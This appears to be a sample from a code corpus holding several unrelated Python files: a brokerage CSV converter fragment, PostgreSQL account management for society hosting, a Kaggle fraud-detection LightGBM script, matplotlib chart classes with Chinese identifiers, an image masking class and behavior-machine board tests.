# Cash in
if title == "Einzahlung":
f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Einlage", "", "", event["cashChangeAmount"], "", "", ""))
elif title == "Auszahlung":
f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Entnahme", "", "", abs(event["cashChangeAmount"]), "", "", ""))
# Dividend - Shares
elif title == "Reinvestierung":
# TODO: Implement reinvestment
print("Detected reivestment, skipping... (not implemented yet)")
# Dividend - Cash
elif "Gutschrift Dividende" in body:
isin = getIsinFromStockName(title)
amountPerShare = getDecimalFromString(body)
f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Dividende", "", amountPerShare, event["cashChangeAmount"], "", isin, title))
if isin == "" and title not in missingIsins.keys():
missingIsins[title] = ""
print('WARNING: Company not found ({0}), missing ISIN'.format(title))
# Savings plan execution or normal buy
elif body.startswith("Sparplan ausgeführt") or body.startswith("Kauf") or body.startswith("Limit Kauf zu"):
fee = 0
if body.startswith("Kauf") or body.startswith("Limit Kauf zu"):
fee = 1.0
isin = getIsinFromStockName(title)
amountPerShare = abs(float(getDecimalFromString(body)))
cashChangeAmount = abs(event["cashChangeAmount"])
shares = '{0:.4f}'.format((cashChangeAmount-fee)/amountPerShare)
f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Kauf", shares, amountPerShare, cashChangeAmount, fee, isin, title))
if isin == "" and title not in missingIsins.keys():
missingIsins[title] = ""
print('WARNING: Company not found ({0}), missing ISIN'.format(title))
# Sell
elif body.startswith("Verkauf") or body.startswith("Limit Verkauf zu"):
isin = getIsinFromStockName(title)
amountPerShare = abs(float(getDecimalFromString(body)))
cashChangeAmount = abs(event["cashChangeAmount"])
shares = '{0:.4f}'.format(cashChangeAmount/amountPerShare)
f.write('{0};{1};{2};{3};{4};{5};{6};{7}\n'.format(date, "Verkauf", shares, amountPerShare, cashChangeAmount, "1.0", isin, title))
if isin == "" and title not in missingIsins.keys():
missingIsins[title] = ""
print('WARNING: Company not found ({0}), missing ISIN'.format(title))
if len(missingIsins.keys()) > 0:
print("--- MISSING ISINs ---")
print(json.dumps(missingIsins, indent="\t", sort_keys=True))
print("Add ISINs to companyNameIsins.json and start again\n")
print("Finished!") | StarcoderdataPython |
4911556 | <reponame>bcherry/bcherry
def deposit(amt):
f = open('data')
bal = int(f.readline())
f.close()
f = open('data','w')
| StarcoderdataPython |
6461676 | """
PostgreSQL accounts and databases for members and societies.
"""
from functools import wraps
from typing import Optional, List, Set, Tuple, Union
from psycopg2.extensions import connection as Connection, cursor as Cursor
from srcf.database import Member, Society
from srcf.database.queries import get_member, get_society
from ..email import send
from ..plumbing import pgsql
from ..plumbing.common import Collect, Owner, State, owner_name, Password, Result, Unset
def connect(db: Optional[str] = None) -> Connection:
"""
Connect to the PostgreSQL server using ident authentication.
"""
return pgsql.connect("postgres.internal", db or "sysadmins")
@wraps(pgsql.context)
def context(db: Optional[str] = None):
"""
Run multiple PostgreSQL commands in a single connection:
with context() as cursor:
create_account(cursor, owner)
create_database(cursor, owner)
"""
return pgsql.context(connect(db))
def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:
"""
Find all PostgreSQL databases belonging to a given owner.
"""
try:
role = pgsql.get_role(cursor, owner_name(owner))
except KeyError:
return []
else:
return pgsql.get_role_databases(cursor, role)
@Result.collect_value
def new_account(cursor: Cursor, owner: Owner) -> Collect[Optional[Password]]:
"""
Create a PostgreSQL user account for a given member or society.
For members, grants are added to all society roles for which they are a member.
"""
username = owner_name(owner)
res_passwd = yield from pgsql.ensure_user(cursor, username)
if isinstance(owner, Member):
yield sync_member_roles(cursor, owner)
elif isinstance(owner, Society):
yield sync_society_roles(cursor, owner)
return res_passwd.value
def _sync_roles(cursor: Cursor, current: Set[Tuple[str, pgsql.Role]],
needed: Set[Tuple[str, pgsql.Role]]):
for username, role in needed - current:
yield pgsql.grant_role(cursor, username, role)
for username, role in current - needed:
yield pgsql.revoke_role(cursor, username, role)
@Result.collect
def sync_member_roles(cursor: Cursor, member: Member) -> Collect[None]:
"""
Adjust grants for society roles to match the given member's memberships.
"""
if not member.societies:
return
username = owner_name(member)
current: Set[Tuple[str, pgsql.Role]] = set()
for role in pgsql.get_user_roles(cursor, username):
# Filter active roles to those owned by society accounts.
if role[0] == member.crsid:
continue
try:
get_society(role[0])
except KeyError:
continue
else:
current.add((username, role))
roles = pgsql.get_roles(cursor, *(soc.society for soc in member.societies))
needed = set((username, role) for role in roles)
yield from _sync_roles(cursor, current, needed)
@Result.collect
def sync_society_roles(cursor: Cursor, society: Society) -> Collect[None]:
"""
Adjust grants for member roles to match the given society's admins.
"""
try:
role = pgsql.get_role(cursor, owner_name(society))
except KeyError:
return
current: Set[Tuple[str, pgsql.Role]] = set()
for username in pgsql.get_role_users(cursor, role):
# Filter active roles to those owned by member accounts.
try:
get_member(username)
except KeyError:
continue
else:
current.add((username, role))
needed = set((user[0], role) for user in pgsql.get_roles(cursor, *society.admin_crsids))
yield from _sync_roles(cursor, current, needed)
@Result.collect_value
def reset_password(cursor: Cursor, owner: Owner) -> Collect[Password]:
"""
Reset the password of a member's or society's PostgreSQL user account.
"""
res_passwd = yield from pgsql.reset_password(cursor, owner_name(owner))
yield send(owner, "tasks/pgsql_password.j2", {"username": owner_name(owner),
"password": res_passwd.value})
return res_passwd.value
def drop_account(cursor: Cursor, owner: Owner) -> Result[Unset]:
"""
Drop a PostgreSQL user account for a given member or society.
"""
return pgsql.drop_user(cursor, owner_name(owner))
@Result.collect_value
def create_database(cursor: Cursor, owner: Owner, name: Optional[str] = None) -> Collect[str]:
"""
Create a new PostgreSQL database for the owner, defaulting to one matching their username.
"""
role = pgsql.get_role(cursor, owner_name(owner))
name = name or role[0]
yield pgsql.create_database(cursor, name, role)
return name
@Result.collect_value
def drop_database(cursor: Cursor, target: Union[Owner, str]) -> Collect[str]:
"""
Drop the named, or owner-named, PostgreSQL database.
"""
name = target if isinstance(target, str) else owner_name(target)
yield pgsql.drop_database(cursor, name)
return name
@Result.collect
def drop_all_databases(cursor: Cursor, owner: Owner) -> Collect[None]:
"""
Drop all databases belonging to the owner.
"""
for database in get_owned_databases(cursor, owner):
yield pgsql.drop_database(cursor, database)
@Result.collect_value
def create_account(cursor: Cursor, owner: Owner) -> Collect[Tuple[Optional[Password], str]]:
"""
Create a PostgreSQL user account and initial database for a member or society.
"""
res_account = yield from new_account(cursor, owner)
res_db = yield from create_database(cursor, owner)
if res_account.state == State.created:
yield send(owner, "tasks/pgsql_create.j2", {"username": owner_name(owner),
"password": res_account.value,
"database": res_db.value})
return (res_account.value, res_db.value)
| StarcoderdataPython |
11372494 | #https://www.kaggle.com/kyakovlev/ieee-simple-lgbm
# General imports
import numpy as np
import pandas as pd
import os, sys, gc, warnings, random, datetime
import time
import pickle
from sklearn import metrics
from sklearn.model_selection import train_test_split, KFold
from sklearn.preprocessing import LabelEncoder
from litemort import *
from tqdm import tqdm
import math
warnings.filterwarnings('ignore')
isMORT = len(sys.argv)>1 and sys.argv[1] == "mort"
isMORT = True
model='MORT' if isMORT else 'LGB'
NFOLDS = 8
#some_rows = 5000
some_rows = None
data_root = 'E:/Kaggle/ieee_fraud/input/'
#data_root = '../input/'
pkl_path = f'{data_root}/_kyakovlev_{some_rows}.pickle'
def M_PickSamples(pick_samples,df_train,df_test):
nMost = min(df_train.shape[0], df_test.shape[0])
random.seed(42)
subset = random.sample(range(nMost), pick_samples)
df_train = df_train.iloc[subset, :].reset_index(drop=True)
df_test = df_test.iloc[subset, :].reset_index(drop=True)
print('====== Mort_PickSamples ... df_train={} df_test={}'.format(df_train.shape, df_test.shape))
return df_train,df_test
def seed_everything(seed=0):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
def reduce_mem_usage(df, verbose=True):
numerics = ['int16', 'int32', 'int64', 'float16', 'float32', 'float64']
start_mem = df.memory_usage().sum() / 1024**2
for col in df.columns:
col_type = df[col].dtypes
if col_type in numerics:
c_min = df[col].min()
c_max = df[col].max()
if str(col_type)[:3] == 'int':
if c_min > np.iinfo(np.int8).min and c_max < np.iinfo(np.int8).max:
df[col] = df[col].astype(np.int8)
elif c_min > np.iinfo(np.int16).min and c_max < np.iinfo(np.int16).max:
df[col] = df[col].astype(np.int16)
elif c_min > np.iinfo(np.int32).min and c_max < np.iinfo(np.int32).max:
df[col] = df[col].astype(np.int32)
elif c_min > np.iinfo(np.int64).min and c_max < np.iinfo(np.int64).max:
df[col] = df[col].astype(np.int64)
else:
if c_min > np.finfo(np.float16).min and c_max < np.finfo(np.float16).max:
df[col] = df[col].astype(np.float16)
elif c_min > np.finfo(np.float32).min and c_max < np.finfo(np.float32).max:
df[col] = df[col].astype(np.float32)
else:
df[col] = df[col].astype(np.float64)
end_mem = df.memory_usage().sum() / 1024**2
if verbose: print('Mem. usage decreased to {:5.2f} Mb ({:.1f}% reduction)'.format(end_mem, 100 * (start_mem - end_mem) / start_mem))
return df
import lightgbm as lgb
def make_predictions(tr_df, tt_df, features_columns, target, lgb_params, NFOLDS=2):
print(f'train_df={tr_df.shape} test_df={tt_df.shape} \nlgb_params={lgb_params}')
folds = KFold(n_splits=NFOLDS, shuffle=True, random_state=SEED)
#X, y = tr_df[features_columns], tr_df[target]
#P, P_y = tt_df[features_columns], tt_df[target]
y, P_y = tr_df[target], tt_df[target]
predictions = np.zeros(len(tt_df))
for fold_, (trn_idx, val_idx) in enumerate(folds.split(tr_df[features_columns], y)):
t0=time.time()
print('Fold:', fold_)
tr_x, tr_y = tr_df[features_columns].iloc[trn_idx, :], y[trn_idx]
vl_x, vl_y = tr_df[features_columns].iloc[val_idx, :], y[val_idx]
print(len(tr_x), len(vl_x))
if isMORT:
model = LiteMORT(lgb_params).fit(tr_x, tr_y, eval_set=[(vl_x, vl_y)])
best_iter = 1000
# pred_val = model.predict(vl_x)
pred_raw = model.predict_raw(vl_x)
# y_pred[val_idx] = pred_raw
fold_score = metrics.roc_auc_score(vl_y, pred_raw)
pp_p = model.predict_raw(tt_df[features_columns])
else:
tr_data = lgb.Dataset(tr_x, label=tr_y)
if LOCAL_TEST:
vl_data = lgb.Dataset(tt_df[features_columns], label=P_y)
else:
vl_data = lgb.Dataset(vl_x, label=vl_y)
estimator = lgb.train(
lgb_params,
tr_data,
valid_sets=[tr_data, vl_data],
verbose_eval=200,
)
pred_raw = estimator.predict(vl_x)
fold_score = metrics.roc_auc_score(vl_y, pred_raw)
pp_p = estimator.predict(tt_df[features_columns])
del tr_data, vl_data
predictions += pp_p / NFOLDS
if LOCAL_TEST:
feature_imp = pd.DataFrame(sorted(zip(estimator.feature_importance(), X.columns)),
columns=['Value', 'Feature'])
print(feature_imp)
print(f'Fold:{fold_} score={fold_score} time={time.time() - t0:.4g} tr_x={tr_x.shape} val_x={vl_x.shape}')
del tr_x, tr_y, vl_x, vl_y
gc.collect()
#break
tt_df = tt_df[['TransactionID', target]]
tt_df['prediction'] = predictions
gc.collect()
return tt_df,fold_score
SEED = 42
seed_everything(SEED)
LOCAL_TEST = False
TARGET = 'isFraud'
START_DATE = datetime.datetime.strptime('2017-11-30', '%Y-%m-%d')
lgb_params = {
'objective':'binary',
'boosting_type':'gbdt',
'metric':'auc',
'n_jobs':-1,
'learning_rate':0.01,
"adaptive":'weight',
"prune":0,
'num_leaves': 2**8,
'max_depth':-1,
'tree_learner':'serial',
'colsample_bytree': 0.7,
'subsample_freq':1,
'subsample':0.7,
'n_estimators':800,
'max_bin':255,
'verbose':666,
'seed': SEED,
'early_stopping_rounds':100,
}
if os.path.isfile(pkl_path):
print("====== Load pickle @{} ......".format(pkl_path))
with open(pkl_path, "rb") as fp:
[train_df, test_df, features_columns] = pickle.load(fp)
else:
print('Load Data......')
train_df = pd.read_pickle(f'{data_root}/ieee-fe-with-some-eda/train_df.pkl')
if LOCAL_TEST:
test_df = train_df[train_df['DT_M']==train_df['DT_M'].max()].reset_index(drop=True)
train_df = train_df[train_df['DT_M']<(train_df['DT_M'].max()-1)].reset_index(drop=True)
else:
test_df = pd.read_pickle(f'{data_root}/ieee-fe-with-some-eda/test_df.pkl')
remove_features = pd.read_pickle(f'{data_root}/ieee-fe-with-some-eda/remove_features.pkl')
remove_features = list(remove_features['features_to_remove'].values)
print('Load Data OK\nShape control:', train_df.shape, test_df.shape)
features_columns = [col for col in list(train_df) if col not in remove_features]
########################### Final Minification
print('reduce_mem_usage......')
train_df = reduce_mem_usage(train_df)
test_df = reduce_mem_usage(test_df)
print('reduce_mem_usage......OK!!!')
if some_rows is not None:
train_df,test_df = M_PickSamples(some_rows,train_df,test_df)
with open(pkl_path, "wb") as fp: # Pickling
pickle.dump([train_df, test_df, features_columns], fp)
print("====== Dump pickle @{} ......OK".format(pkl_path))
if LOCAL_TEST:
lgb_params['learning_rate'] = 0.01
lgb_params['n_estimators'] = 20000
lgb_params['early_stopping_rounds'] = 100
test_predictions = make_predictions(train_df, test_df, features_columns, TARGET, lgb_params)
print(metrics.roc_auc_score(test_predictions[TARGET], test_predictions['prediction']))
else:
lgb_params['learning_rate'] = 0.005
lgb_params['n_estimators'] = 5000
lgb_params['early_stopping_rounds'] = 100
test_predictions,fold_score = make_predictions(train_df, test_df, features_columns, TARGET, lgb_params, NFOLDS=NFOLDS)
test_predictions['isFraud'] = test_predictions['prediction']
if some_rows is None:
# test_predictions[['TransactionID', 'isFraud']].to_csv(f'submit_{some_rows}_{0.5}.csv', index=False,compression='gzip')
path = f'E:/Kaggle/ieee_fraud/result/[{model}]_{some_rows}_{fold_score:.5f}_F{NFOLDS}_.csv'
test_predictions[['TransactionID', 'isFraud']].to_csv(path, index=False) # ,compression='gzip'
print(f"test_predictions[['TransactionID', 'isFraud']] to_csv @{path}")
input("Press Enter to exit...") | StarcoderdataPython |
6461708 | <filename>PIP/Minor Assignment 7/a7q2.py
def cumulative(lst):
c_lst=[ ]
length=len(lst)
c_lst=[ sum(lst[0:x:1]) for x in range(0, length +1)]
return c_lst[1:]
lst=[1,2,3,4,5]
print(cumulative(lst))
| StarcoderdataPython |
5055805 | <gh_stars>10-100
#-*- coding: utf-8 -*-
import random,io
import matplotlib.pyplot as plt
import numpy as np
from .public import *
图表颜色 = [
'#F0F8FF', '#FAEBD7', '#00FFFF', '#7FFFD4', '#F0FFFF', '#F5F5DC', '#FFE4C4', '#FFEBCD', '#8A2BE2', '#A52A2A',
'#DEB887', '#5F9EA0', '#7FFF00', '#D2691E', '#FF7F50', '#6495ED', '#FFF8DC', '#DC143C', '#00FFFF', '#008B8B',
'#B8860B', '#A9A9A9', '#006400', '#BDB76B', '#8B008B', '#556B2F', '#FF8C00', '#9932CC', '#8B0000', '#E9967A',
'#8FBC8F', '#483D8B', '#2F4F4F', '#00CED1', '#9400D3', '#FF1493', '#00BFFF', '#696969', '#1E90FF', '#B22222',
'#FFFAF0', '#228B22', '#FF00FF', '#DCDCDC', '#F8F8FF', '#FFD700', '#DAA520', '#808080', '#008000', '#ADFF2F',
'#F0FFF0', '#FF69B4', '#CD5C5C', '#4B0082', '#F0E68C', '#E6E6FA', '#FFF0F5', '#7CFC00', '#FFFACD', '#ADD8E6',
'#F08080', '#E0FFFF', '#90EE90', '#D3D3D3', '#FFB6C1', '#FFA07A', '#20B2AA', '#87CEFA', '#778899', '#B0C4DE',
'#00FF00', '#32CD32', '#FAF0E6', '#FF00FF', '#800000', '#66CDAA', '#BA55D3', '#9370DB', '#3CB371', '#7B68EE',
'#00FA9A', '#48D1CC', '#C71585', '#191970', '#F5FFFA', '#FFE4E1', '#FFE4B5', '#FFDEAD', '#FDF5E6', '#808000',
'#6B8E23', '#FFA500', '#FF4500', '#DA70D6', '#EEE8AA', '#98FB98', '#AFEEEE', '#DB7093', '#FFEFD5', '#FFDAB9',
'#CD853F', '#FFC0CB', '#DDA0DD', '#B0E0E6', '#800080', '#FF0000', '#BC8F8F', '#4169E1', '#8B4513', '#FA8072',
'#FAA460', '#2E8B57', '#FFF5EE', '#A0522D', '#C0C0C0', '#87CEEB', '#6A5ACD', '#708090', '#FFFAFA', '#00FF7F',
'#4682B4', '#D2B48C', '#008080', '#D8BFD8', '#FF6347', '#40E0D0', '#EE82EE', '#F5DEB3', '#F5F5F5', '#FFFF00',
'#9ACD32']
class 圆饼图:
def __init__(self,标签列表=[],数值列表=[],颜色列表=[],间隔列表=[],起始角度=90,数值显示距离=0.6,保留小数位数=2,阴影=False,显示图例=True,宽高=()):
self.plt = plt
self.标签列表 = 标签列表
self.数值列表 = 数值列表
self.颜色列表 = 颜色列表
self.间隔列表 = 间隔列表
self.起始角度 = 起始角度 #逆时针起始角度设置
self.数值显示位置 = 数值显示距离 #0-1,数值距圆心半径倍数距离
self.保留小数位数 = 保留小数位数 #数值保留固定小数位
self.显示阴影 = 阴影 #设置阴影
self.宽高 = ()
self.显示图例 = 显示图例
@异常处理返回类型逻辑型
def 生成(self,保存地址='',显示=True):
'返回:图片二进制,标签列表,比例列表'
fig = self.plt.figure()
self.plt.rcParams['font.sans-serif'] = ['SimHei'] # 解决中文乱码
if self.宽高:
self.plt.figure(figsize=(self.宽高[0],self.宽高[1]))
if not self.标签列表 and not self.数值列表:
self.标签列表 = ['张三','李四','王五']
self.数值列表 = [111,222,333]
数量 = len(self.标签列表)
if not self.颜色列表 or len(self.颜色列表)<数量:
颜色列表 = random.sample(图表颜色, 数量)
else:
颜色列表 = self.颜色列表
if not self.间隔列表 or len(self.间隔列表)<数量:
self.间隔列表 = [0 for i in range(数量)]
patches, text1, text2 = self.plt.pie(self.数值列表,
explode=self.间隔列表,
labels=self.标签列表,
colors=颜色列表,
autopct='%.{}f%%'.format(self.保留小数位数),
shadow=self.显示阴影,
startangle=self.起始角度,
pctdistance=self.数值显示位置)
self.plt.axis('equal')
if self.显示图例:
self.plt.legend()
if 保存地址:
self.plt.savefig(保存地址)
if 显示:
self.plt.show()
canvas=fig.canvas
buffer = io.BytesIO()
canvas.print_png(buffer)
data = buffer.getvalue()
buffer.close()
标签列表=[]
比例列表=[]
for x in range(len(text1)):
标签列表.append(text1[x].get_text())
比例列表.append(text2[x].get_text())
return data,标签列表,比例列表
class 柱状图:
def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],名称列表=[],颜色列表=[],柱宽=0.25,标题字体大小=20,显示项目名称=True):
self.np = np
self.plt = plt
self.宽高 = 宽高
self.标题 = 标题
self.横向标题 = 横向标题
self.纵向标题 = 纵向标题
self.标签列表 = 标签列表
self.数值列表 = [数值列表] if 数值列表 else []
self.颜色列表 = 颜色列表
self.名称列表 = 名称列表
self.柱宽 = 柱宽
self.显示项目名称 = 显示项目名称
self.标题字体大小 = 标题字体大小
@异常处理返回类型逻辑型
def 加入新数值列表(self,数值列表):
self.数值列表.append(数值列表)
@异常处理返回类型逻辑型
def 生成(self, 保存地址='', 显示=True):
self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
fig = self.plt.figure()
if not self.标签列表 and not self.数值列表:
self.标签列表 = ['a', 'b', 'c', 'd', 'e']
self.数值列表 = [[33, 25, 15, 10, 3],[13, 15, 13, 5, 8]]
数量 = len(self.标签列表)
x = self.np.arange(数量)
if self.宽高:
self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
if not self.名称列表 or len(self.名称列表)<len(self.数值列表):
self.名称列表 = ['名称'+str(i) for i in range(数量)]
if not self.颜色列表 or len(self.颜色列表) < 数量:
颜色列表 = random.sample(图表颜色, 数量)
else:
颜色列表 = self.颜色列表
for i in range(len(self.数值列表)):
d = {'tick_label':self.标签列表} if i == 0 else {}
if self.显示项目名称:
d['label'] = self.名称列表[i]
self.plt.bar(x+i*self.柱宽, self.数值列表[i], width=self.柱宽, color=颜色列表[i],**d)
for a, b in zip(x, self.数值列表[i]):
self.plt.text(a+i*self.柱宽, b + 0.1, b, ha='center', va='bottom')
self.plt.xticks()
if self.显示项目名称:
self.plt.legend(loc="upper right") # (左.left 右.right)防止label和图像重合显示不出来
self.plt.ylabel(self.纵向标题)
self.plt.xlabel(self.横向标题)
self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
if 保存地址:
self.plt.savefig(保存地址)
if 显示:
self.plt.show()
canvas = fig.canvas
buffer = io.BytesIO()
canvas.print_png(buffer)
data = buffer.getvalue()
buffer.close()
return data
class 横向柱状图:
def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],颜色值="",标题字体大小=20,显示项目名称=True):
self.np = np
self.plt = plt
self.宽高 = 宽高
self.标题 = 标题
self.横向标题 = 横向标题
self.纵向标题 = 纵向标题
self.标签列表 = 标签列表
self.数值列表 = 数值列表
self.颜色 = 颜色值
self.标题字体大小 = 标题字体大小
@异常处理返回类型逻辑型
def 生成(self, 保存地址='', 显示=True):
self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
fig = self.plt.figure()
if self.宽高:
self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
if not self.颜色:
self.颜色 = random.choice(图表颜色)
if not self.标签列表 and not self.数值列表:
self.标签列表 = ['a', 'b', 'c', 'd', 'e']
self.数值列表 = [33, 25, 15, 10, 3]
fig, ax = self.plt.subplots()
ax.barh(self.标签列表, self.数值列表, color=self.颜色)
labels = ax.get_xticklabels()
self.plt.setp(labels, rotation=0, horizontalalignment='right')
for a, b in zip(self.标签列表, self.数值列表):
self.plt.text(b + 1, a, b, ha='center', va='center')
self.plt.ylabel(self.纵向标题)
self.plt.xlabel(self.横向标题)
self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
if 保存地址:
self.plt.savefig(保存地址)
if 显示:
self.plt.show()
canvas = fig.canvas
buffer = io.BytesIO()
canvas.print_png(buffer)
data = buffer.getvalue()
buffer.close()
return data
class 重叠柱状图:
def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],名称列表=[],颜色列表=[],柱宽=None,标题字体大小=20,显示项目名称=True):
self.np = np
self.plt = plt
self.宽高 = 宽高
self.标题 = 标题
self.横向标题 = 横向标题
self.纵向标题 = 纵向标题
self.标签列表 = 标签列表
self.数值列表 = [数值列表] if 数值列表 else []
self.颜色列表 = 颜色列表
self.名称列表 = 名称列表
self.柱宽 = 柱宽
self.显示项目名称 = 显示项目名称
self.标题字体大小 = 标题字体大小
@异常处理返回类型逻辑型
def 加入新数值列表(self,数值列表):
self.数值列表.append(数值列表)
@异常处理返回类型逻辑型
def 生成(self, 保存地址='', 显示=True):
self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
fig = self.plt.figure()
if not self.标签列表 and not self.数值列表:
self.标签列表 = ['a', 'b', 'c', 'd', 'e']
self.数值列表 = [[33, 25, 15, 10, 9],[13, 15, 13, 5, 8]]
数量 = len(self.标签列表)
x = self.np.arange(数量)
if self.宽高:
self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
if not self.名称列表 or len(self.名称列表)<len(self.数值列表):
self.名称列表 = ['名称'+str(i) for i in range(数量)]
if not self.颜色列表 or len(self.颜色列表) < 数量:
颜色列表 = random.sample(图表颜色, 数量)
else:
颜色列表 = self.颜色列表
for i in range(len(self.数值列表)):
d = {'tick_label':self.标签列表} if i == 0 else {}
if self.显示项目名称:
d['label'] = self.名称列表[i]
if self.柱宽:
d['width'] = self.柱宽
self.plt.bar(self.标签列表, self.数值列表[i], color=颜色列表[i],**d)
for a, b in zip(x, self.数值列表[i]):
self.plt.text(a, b + 0.1, b, ha='center', va='bottom')
self.plt.xticks(self.np.arange(数量), self.标签列表, rotation=0, fontsize=10)
if self.显示项目名称:
self.plt.legend(loc="upper right") # (左.left 右.right)防止label和图像重合显示不出来
self.plt.ylabel(self.纵向标题)
self.plt.xlabel(self.横向标题)
self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
if 保存地址:
self.plt.savefig(保存地址)
if 显示:
self.plt.show()
canvas = fig.canvas
buffer = io.BytesIO()
canvas.print_png(buffer)
data = buffer.getvalue()
buffer.close()
return data
class 折线图:
def __init__(self,宽高=(),标题="",横向标题="",纵向标题="",标签列表=[],数值列表=[],名称列表=[],颜色列表=[],标题字体大小=20,显示项目名称=True,显示数值=True,显示圆点=True):
self.np = np
self.plt = plt
self.宽高 = 宽高
self.标题 = 标题
self.横向标题 = 横向标题
self.纵向标题 = 纵向标题
self.标签列表 = 标签列表
self.数值列表 = [数值列表] if 数值列表 else []
self.颜色列表 = 颜色列表
self.名称列表 = 名称列表
self.显示项目名称 = 显示项目名称
self.标题字体大小 = 标题字体大小
self.显示数值 = 显示数值
self.显示圆点 = 显示圆点
@异常处理返回类型逻辑型
def 加入新数值列表(self,数值列表):
self.数值列表.append(数值列表)
@异常处理返回类型逻辑型
def 生成(self, 保存地址='', 显示=True):
self.plt.rcParams['font.sans-serif'] = 'Microsoft YaHei'
fig = self.plt.figure()
if not self.标签列表 and not self.数值列表:
self.标签列表 = ['a', 'b', 'c', 'd', 'e']
self.数值列表 = [[33, 25, 15, 10, 3],[13, 15, 13, 5, 8]]
数量 = len(self.标签列表)
x = self.np.arange(数量)
if self.宽高:
self.plt.figure(figsize=(self.宽高[0], self.宽高[1]))
if not self.名称列表 or len(self.名称列表)<len(self.数值列表):
self.名称列表 = ['名称'+str(i) for i in range(数量)]
if not self.颜色列表 or len(self.颜色列表) < 数量:
颜色列表 = random.sample(图表颜色, 数量)
else:
颜色列表 = self.颜色列表
for i in range(len(self.数值列表)):
d = {}
if self.显示项目名称:
d['label'] = self.名称列表[i]
if self.显示圆点:
d['marker'] = '.'
self.plt.plot(self.标签列表,self.数值列表[i],color=颜色列表[i],linewidth=1,mfc='w',markersize=10,mfcalt='b',**d)
if self.显示数值:
for a, b in zip(self.标签列表, self.数值列表[i]):
plt.text(a, b, b, ha='center', va='bottom', fontsize=8)
if self.显示项目名称:
self.plt.legend(loc="upper right") # (左.left 右.right)防止label和图像重合显示不出来
self.plt.ylabel(self.纵向标题)
self.plt.xlabel(self.横向标题)
self.plt.title(self.标题,fontdict = {'fontsize':self.标题字体大小})
#加虚线背景 透明度1 去掉是实线
self.plt.grid(alpha=1,linestyle=':')
if 保存地址:
self.plt.savefig(保存地址)
if 显示:
self.plt.show()
canvas = fig.canvas
buffer = io.BytesIO()
canvas.print_png(buffer)
data = buffer.getvalue()
buffer.close()
return data | StarcoderdataPython |
4890657 | import numpy as np
class Image:
'''
Class to hold image data
Attributes
-----------
img: np.ndarray
numpy ndarray containing the image as grayscale float values,
should be normalized to [0, 1.0]
timestamp: astropy.time.Time
Time when the image was taken
timestamp: Camera
Instance of the camera that took the picture
'''
def __init__(self, data, timestamp):
self.data = data
self.masked = data.copy()
self.timestamp = timestamp
def mask_inside_radius(self, radius, center_row, center_col):
row = np.arange(self.data.shape[0])
col = np.arange(self.data.shape[1])
row, col = np.meshgrid(row, col)
r = np.sqrt((row - center_row)**2 + (col - center_col)**2)
self.masked[r <= radius] = 0.0
def mask_outside_radius(self, radius, center_row, center_col):
row = np.arange(self.data.shape[0])
col = np.arange(self.data.shape[1])
row, col = np.meshgrid(row, col)
r = np.sqrt((row - center_row)**2 + (col - center_col)**2)
self.masked[r >= radius] = 0.0
def add_mask(self, img, threshold=0.5):
self.masked[img <= threshold] = 0.0
def reset_mask(self):
self.masked = self.data.copy()
| StarcoderdataPython |
4944561 | from .compressor import *
from .pop import *
| StarcoderdataPython |
1902043 | <reponame>Schwarzbaer/behavior_machine
from behavior_machine.library import WaitState, IdleState
import pytest
from behavior_machine.board import Board
from behavior_machine.core import State, StateStatus, Machine
class SetState(State):
_val: str
_key: str
def __init__(self, name, key, val):
super().__init__(name)
self._val = val
self._key = key
def execute(self, board):
board.set("key", self._val)
return StateStatus.SUCCESS
class GetState(State):
_key: str
def __init__(self, name, key):
super().__init__(name)
self._key = key
def execute(self, board):
value = board.get(self._key)
board.set("output", value)
return StateStatus.SUCCESS
class DummyState(State):
def execute(self, board):
return StateStatus.SUCCESS
def test_external_set_get():
b = Board()
b.set("x", "key1")
assert b.get('x') == 'key1'
def test_replaced_set():
b = Board()
b.set("x", "hello")
b.set("x", "world")
assert b.get('x') == 'world'
def test_get_non_exist():
b = Board()
assert b.get('key') is None
def test_board_set_deep_copy():
b = Board()
test_obj = {
'hello': 'world'
}
b.set('obj', test_obj, deep_copy=False)
test_obj['hello'] = 'test'
assert b.get('obj')['hello'] == 'test'
assert b.get('obj')['hello'] != 'world'
def test_board_get_deep_copy():
b = Board()
test_obj = {
'hello': 'world'
}
b.set('obj', test_obj, deep_copy=False)
rtn_obj = b.get('obj', False)
assert rtn_obj['hello'] == 'world'
test_obj['hello'] = 'test'
assert rtn_obj['hello'] == 'test'
def test_board_exist_func():
b = Board()
b.set('hello', 'XXX')
assert b.exist('hello')
assert not b.exist('hello2')
assert not b.exist('hell')
def test_internal_set():
s1 = DummyState('s1')
set_state = SetState('set', 'key', 'hello')
s1.add_transition_on_success(set_state)
exe = Machine("xe", s1)
b = Board()
exe.start(b, manual_exec=True)
exe.update(b, wait=True)
assert b.get('key') == 'hello'
def test_internal_get():
s1 = DummyState('s1')
get_state = GetState('set', 'key')
s1.add_transition_on_success(get_state)
exe = Machine("xe", s1)
b = Board()
b.set("key", "hello_get")
exe.start(b, manual_exec=True)
exe.update(b, wait=True)
assert b.get('output') == 'hello_get'
def test_object_set_get(capsys):
class SetState(State):
def execute(self, board: Board):
obj = {
'hello': [1, 2, 3],
'name': {
'first': 'test'
}
}
board.set('obj', obj)
obj['name'] = {}
return StateStatus.SUCCESS
class GetState(State):
def execute(self, board):
obj = board.get('obj')
assert obj['hello'] == [1, 2, 3]
assert obj['name']['first'] == 'test'
return StateStatus.SUCCESS
s = SetState('s')
g = GetState('g')
